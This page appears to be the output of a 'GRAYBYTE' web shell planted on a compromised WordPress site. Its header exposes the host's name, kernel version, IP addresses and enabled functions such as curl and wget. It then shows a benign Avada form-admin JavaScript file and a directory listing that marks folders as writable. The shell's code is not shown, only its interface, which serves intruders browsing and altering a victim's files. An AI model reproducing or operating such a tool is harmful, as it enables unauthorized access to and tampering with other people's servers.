✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ webm004.cluster127.gra.hosting.ovh.net ​🇻​♯➤ 6.18.42-ovh-vps-grsec-zfs+ #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 54.36.91.62 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.223
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗙𝗙 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ _dyuweyrj4,_dyuweyrj4r,dl

𝗛𝗢𝗠𝗘
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /home/docteuh/www/modules/js//fusion-form-admin.js
/* global fusionBuilderConfig, ajaxurl */
( function( jQuery ) {
	var currentPage = 1,
		totalPages  = 0;

	'use strict';

	jQuery( document ).ready( function() {

		jQuery( '.fusion-remove-form-entry' ).on( 'click', function( event ) {
			var self = this;

			event.preventDefault();

			if ( window.confirm( fusionBuilderConfig.remove_entry_message ) ) { // eslint-disable-line no-alert
				jQuery.ajax( {
					type: 'POST',
					url: fusionBuilderConfig.ajaxurl,
					data: {
						action: 'fusion_remove_form_entry',
						fusion_entry_nonce: fusionBuilderConfig.fusion_entry_nonce,
						entry: jQuery( this ).data( 'key' )
					},
					complete: function( response ) {

						if ( 'object' === typeof response.responseJSON && 'undefined' !== response.responseJSON.success && response.responseJSON.success ) {
							jQuery( self ).closest( 'tr' ).remove();
						}

						setTimeout( function() {
							if ( ! jQuery( '.avada_page_avada-form-entries .row-actions' ).length ) {
								jQuery( '#fusion-form-export' ).addClass( 'disabled' );
							}
						}, 50 );
					}
				} );
			}
		} );

		// Export form entries button.
		jQuery( '#fusion-form-export' ).on( 'click', function( event ) {
			event.preventDefault();

			if ( jQuery( '.avada_page_avada-form-entries .row-actions' ).length ) {
				exportForms( jQuery( this ).data( 'form-id' ) );
			}

		} );

		function exportForms( formID ) {

			// Starting export, show status.
			if ( 0 === totalPages ) {
				jQuery( '#fusion-form-export' ).addClass( 'disabled' );
				jQuery( '#fusion-form-export-status' ).css( 'opacity', '1' );
			}

			jQuery.ajax( {
				url: ajaxurl,
				type: 'get',
				data: {
					action: 'fusion_form_export',
					formID: formID,
					currentPage: currentPage,
					totalPages: totalPages,
					nonce: jQuery( '#fusion-form-export-nonce' ).val()
				},
				dataType: 'json'
			} )
			.done( function( result ) {

				// Stop if error.
				if ( 'error_nonce' === result.status || ( 0 < totalPages && currentPage > totalPages ) ) {
					return;
				}

				// Export in progress.
				if ( 'export_processing' === result.status ) {
					currentPage++;

					// First step done.
					if ( 0 === totalPages ) {
						totalPages = result.total_pages;
					}

					// Update export status.
					jQuery( '#fusion-form-export-status-bar' ).css( 'width', ( currentPage / totalPages ) * 100 + '%' ); // eslint-disable-line no-mixed-operators

					exportForms( formID );
				}

				// Export done (last step processed).
				if ( 'export_done' === result.status ) {
					currentPage = 1;
					totalPages  = 0;

					// Reset status.
					jQuery( '#fusion-form-export-status' ).css( 'opacity', '0' );
					jQuery( '#fusion-form-export-status-bar' ).css( 'width', '0' );
					jQuery( '#fusion-form-export' ).removeClass( 'disabled' );

					// Trigger download and cleanup.
					window.location.href = jQuery( '#fusion-form-export' ).attr( 'href' ) + '&nonce=' + jQuery( '#fusion-form-export-nonce' ).val();
				}
			} );
		}

	} );
}( jQuery ) );


Current_dir [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
23 Sep 2026 9.09 AM
docteuh / users
0755
litespeed-cache-index
--
18 Sep 2026 11.07 AM
docteuh / users
0755
fusion-form-admin.js
2.957 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-hubspot-consent-option.js
4.835 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-hubspot-oauth.js
1.364 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-hubspot-option.js
4.502 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-instagram-oauth.js
1.395 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-mailchimp-oauth.js
1.396 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
fusion-mailchimp-option.js
6.447 KB
20 Nov 2023 7.12 PM
docteuh / users
0644
layout-conditions-option.js
16.102 KB
20 Nov 2023 7.12 PM
docteuh / users
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF